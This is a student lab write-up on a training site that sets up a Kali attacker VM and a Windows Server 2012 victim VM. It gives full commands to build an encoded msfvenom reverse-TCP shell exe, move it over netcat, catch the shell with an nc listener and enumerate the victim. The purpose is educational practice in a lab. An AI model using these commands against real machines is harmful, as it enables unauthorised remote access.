Menu

Executive Programs

Workshops

Projects

Blogs

Careers

Placements

Student Reviews


For Business


More

Academic Training

Informative Articles

Find Jobs

We are Hiring!


All Courses

Choose a category

Mechanical

Electrical

Civil

Computer Science

Electronics

Offline Program

All Courses

All Courses

logo

CHOOSE A CATEGORY

Mechanical

Electrical

Civil

Computer Science

Electronics

Offline Program

Top Job Leading Courses

Automotive

CFD

FEA

Design

MBD

Med Tech

Courses by Software

Design

Solver

Automation

Vehicle Dynamics

CFD Solver

Preprocessor

Courses by Semester

First Year

Second Year

Third Year

Fourth Year

Courses by Domain

Automotive

CFD

Design

FEA

Tool-focused Courses

Design

Solver

Automation

Preprocessor

CFD Solver

Vehicle Dynamics

Machine learning

Machine Learning and AI

POPULAR COURSES

coursePost Graduate Program in Hybrid Electric Vehicle Design and Analysis
coursePost Graduate Program in Computational Fluid Dynamics
coursePost Graduate Program in CAD
coursePost Graduate Program in CAE
coursePost Graduate Program in Manufacturing Design
coursePost Graduate Program in Computational Design and Pre-processing
coursePost Graduate Program in Complete Passenger Car Design & Product Development
Executive Programs
Workshops
For Business

Success Stories

Placements

Student Reviews

More

Projects

Blogs

Academic Training

Find Jobs

Informative Articles

We're Hiring!

phone+91 9342691281Log in
  1. Home/
  2. NAVENBABU Y/
  3. Project 1 - Setting up Virtual Machine

Project 1 - Setting up Virtual Machine

Project 1: Setting Up Virtual Machine: 1. Setup Two Virtual Machines: In this first scenario we want to setup two virtual machine one is attack machine and another one is victim machine. The attacker machine is KALI LINUX virtual machine and the victim machine is WINDOW SERVER 2012 virtual machine. Here we want to conform…

    • NAVENBABU Y

      updated on 29 Aug 2022

    Project 1: Setting Up Virtual Machine:

    1. Setup Two Virtual Machines:

    In this first scenario we want to setup two virtual machine one is attack machine and another one is victim machine. The attacker machine is KALI LINUX virtual machine and the victim machine is WINDOW SERVER 2012 virtual machine.

    Here we want to conform the IP Address for both virtual machines,

    • IP Address command in Kali Linux machine is: ifconfig

    Screenshot in kali Linux terminal:

     

    • IP Address command in Window Server 2012 machine is: ipconfig

    Screenshot in Window Server 2012 Comment Prompt:

     

    2. Generate Payload:

    Here using Attacker machine to generate payload like “Window Reverse TCP Shell”. Because, here the victim machine is Window Server 2012 we want get access through the TCP at shell like comment prompt. Here payload is generated as exe file format, because this format is act as application type in victim machine.

    Steps to generate the payload in attacker machine:

    Step 1: Where the attacker machine as Kali Linux we want open the terminal and run the command sudo su for get the root access.

    Step 2: using msfvanom type command to generate the payload.

    Command: $ msfvanom -p window/shell_reverse_tcp -a x86 LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o /home/kali/Desktop/shell.exe

    {(-p) for Payload, (-a) for The architecture to use for payload and encode,(LHOST) for local host number like IP Address, (LPORT) for local port number, (-e) for Encoder,(-i) for Iterations process like the number of time to encode the payload, (-f) for file format, (-o) for outpath like save the payload in the required path}

    Screenshot for generate payload:

    Screenshot of Payload file:

    3. Send the Payload to Victim Machine Using Netcat (Port number is 7555):

    In this scenario using attacker like Kali Linux machine as sender side to transfer the payload to the victim machine like Window Server 2012 act as receiver in this task. The local port number here used to connect both machine is 7555.

    • Sender Side:

    In this sender side using kali Linux terminal to provide a command to transfer the exe file to receiver machine using Netcat method.

    Command: nc -v -w 30 -p 7555 -l < shell.exe

    {(nc) for Netcat access, (-v) for verbose use twice to be more verbose, (-w) for Timeout for connects and final net reads, (-p) for Local Port number, (-l) for listen mode, for inbound connects}

    Screenshot from Sender Side:

     

    • Receiver Side:

    In this Receiver side using Window Server 2012 Comment Prompt to provide a command for receiving the exe file from sender machine Netcat method.

    Command: nc -v -w 30 192.168.1.10 7555 > shell.exe

    {(nc) for Netcat access, (-v) for verbose use twice to be more verbose, (-w) for Timeout for connects and final net reads, 192.168.1.10 is IP Address from sender side}

    Screenshot from Receiver side:

    4. Gain Reverse Shell Access from Victim Machine:

    After download and install the shell.exe file in victim machine, is the door open to access the victim machine by using the attacker machine. Here we use the Local Port number to gain the reverse shell access is 4444.

    Command to get shell access from victim machine is,

    Command: nc -lvp 4444

    {nc for access Netcat}

    {-lvp for (l) is listen mode, for inbound connects, (v) is verbose use twice to be more verbose, (p) is Local Port number 4444}

    Screenshot for Gain Reverse Shell Access:

     

    5. Display Firewall status of Victim Machine:

     After gaining the reverse shell access from the victim machine now use run the command to view user, view firewall status, view victim IP Address.

    Command for Firewall status:

    Command: C:\Users\Administrator> netsh firewall  

    netsh firewall>show state

    Screenshot for firewall Status:

    Command for View User:

    Command: C:\Users\Administrator\Downloads>net user

    net user

    Screenshot for View User:

    Command for View Victim IP Address:

    Command: C:\Users\Administrator>ipconfig

    Ipconfig

    Screenshot for View IP Address:

    Leave a comment

    Thanks for choosing to leave a comment. Please keep in mind that all the comments are moderated as per our comment policy, and your email will not be published for privacy reasons. Please leave a personal & meaningful conversation.

    Please  login to add a comment

    Other comments...

    No comments yet!
    Be the first to add a comment

    Read more Projects by NAVENBABU Y (9)

    Project

    Objective:

    TARA (Technical Assessment and Risk Analysis) Report Product: Headlamp System: Introduction: This TARA report is aimed at analyzing the potential risks associated with damage to the headlamp system. The report presents a comprehensive analysis of the product's technical features, functionality, and potential risks associated…

    calendar

    03 May 2023 06:07 AM IST

      Read more

      Project 2 - Comprehensive Risk Rating System &#40;CRRS&#41;

      Objective:

      Project-2: Comprehensive Risk Rating System (CRRS): Agenda of the Project: Explanation about Risk and detail about Risk formula. Find the vulnerability and Impact of each component were place in Online Bank Security Boundary. Calculate the Risk of Security components using Risk formula. Average total Risk find in security…

      calendar

      06 Jan 2023 04:29 PM IST

        Read more

        Project 1 - Design Enterprise Security Model

        Objective:

        Project 1- Design Enterprise Security Model: Agenda of Project: Introduction detail about the task and include the bank security infrastructure. Express the details of security model were using for bank infrastructure. Express the real-time scenario online banking and background working security boundary. List the checklist…

        calendar

        06 Jan 2023 08:53 AM IST

          Read more

          Project 2 - Installing BWAPP – web app on your local machine

          Objective:

          1. Install BWAPP – web app on your local machine. Successfully exploit the below Vulnerabilities: BWAPP intro: bWAPP, or a buggy web application, is a free and open source deliberately insecure web application. It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.…

          calendar

          06 Dec 2022 05:38 PM IST

          • HTML
          Read more

          Schedule a counselling session

          Please enter your name
          Please enter a valid email
          Please enter a valid number

          Related Courses

          coursecard

          Design loads considered on bridges

          Recently launched

          10 Hours of Content

          coursecard

          Design of Steel Superstructure in Bridges

          Recently launched

          16 Hours of Content

          coursecard

          Design for Manufacturability (DFM)

          Recently launched

          11 Hours of Content

          coursecard

          CATIA for Medical Product Design

          Recently launched

          5 Hours of Content

          coursecardcoursetype

          Accelerated Career Program in Embedded Systems (On-Campus) Courseware Partner: IT-ITes SSC nasscom

          Recently launched

          0 Hours of Content

          Schedule a counselling session

          Please enter your name
          Please enter a valid email
          Please enter a valid number

          logo

          Skill-Lync offers industry relevant advanced engineering courses for engineering students by partnering with industry experts.

          https://d27yxarlh48w6q.cloudfront.net/web/v1/images/facebook.svghttps://d27yxarlh48w6q.cloudfront.net/web/v1/images/insta.svghttps://d27yxarlh48w6q.cloudfront.net/web/v1/images/twitter.svghttps://d27yxarlh48w6q.cloudfront.net/web/v1/images/youtube.svghttps://d27yxarlh48w6q.cloudfront.net/web/v1/images/linkedin.svg

          Our Company

          News & EventsBlogCareersGrievance RedressalSkill-Lync ReviewsTermsPrivacy PolicyBecome an Affiliate
          map
          EpowerX Learning Technologies Pvt Ltd.
          4th Floor, BLOCK-B, Velachery - Tambaram Main Rd, Ram Nagar South, Madipakkam, Chennai, Tamil Nadu 600042.
          mail
          info@skill-lync.com
          mail
          ITgrievance@skill-lync.com

          Top Individual Courses

          Computational Combustion Using Python and CanteraIntroduction to Physical Modeling using SimscapeIntroduction to Structural Analysis using ANSYS WorkbenchIntroduction to Structural Analysis using ANSYS Workbench

          Top PG Programs

          Post Graduate Program in Hybrid Electric Vehicle Design and AnalysisPost Graduate Program in Computational Fluid DynamicsPost Graduate Program in CADPost Graduate Program in Electric Vehicle Design & Development

          Skill-Lync Plus

          Executive Program in Electric Vehicle Embedded SoftwareExecutive Program in Electric Vehicle DesignExecutive Program in Cybersecurity

          Trending Blogs

          How to Learn CAD Design: Step-by-Step GuideGD&T Basics: How to Read and Apply GD&T Symbols SolidWorks vs Creo: Best CAD Software to Learn for Mechanical Engineers Engineering Edtech in India: Busting Myths & Building Careers How to Get a Core Mechanical Engineering Job After Graduation

          © 2025 Skill-Lync Inc. All Rights Reserved.

                      Do You Want To Showcase Your Technical Skills?
                      Sign-Up for our projects.